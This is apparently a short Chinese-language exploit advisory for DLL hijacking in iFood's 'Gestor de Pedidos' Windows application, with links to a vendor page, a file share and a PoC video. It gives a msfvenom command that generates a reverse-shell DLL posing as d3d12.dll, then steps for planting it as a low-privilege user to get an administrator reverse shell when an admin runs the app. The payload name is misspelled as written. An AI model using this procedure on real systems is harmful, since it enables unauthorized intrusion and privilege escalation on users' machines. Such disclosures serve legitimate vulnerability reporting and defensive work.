攻击者将一个名为"d3d12.dll"的恶意DLL放置在应用程序在找到合法"d3d12.dll"之前会搜索的目录中。当应用程序启动时,它会加载恶意DLL而非合法DLL,从而允许攻击者在应用程序的上下文中执行任意代码。
供应商主页:https://gestordepedidos.ifood.com.br/
Google Drive:https://drive.google.com/file/d/1p5SavlbLAE2o59l8jj4j-FkE_Ne_0Y-P/view?usp=sharing
POC视频:https://youtu.be/oMIobV2M0T8
在Kali Linux上使用msfvenom创建恶意DLL文件
msfvenom -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f dll -o d3d12.dll
以低权限用户访问方式将创建的'd3d12.dll'从Kali传输到Windows主机
以低权限用户访问方式将创建的'd3d12.dll'文件移动到'C:\Gestor de Peddios\d3d12.dll'
当管理员运行应用程序时,你将获得管理员权限的反向Shell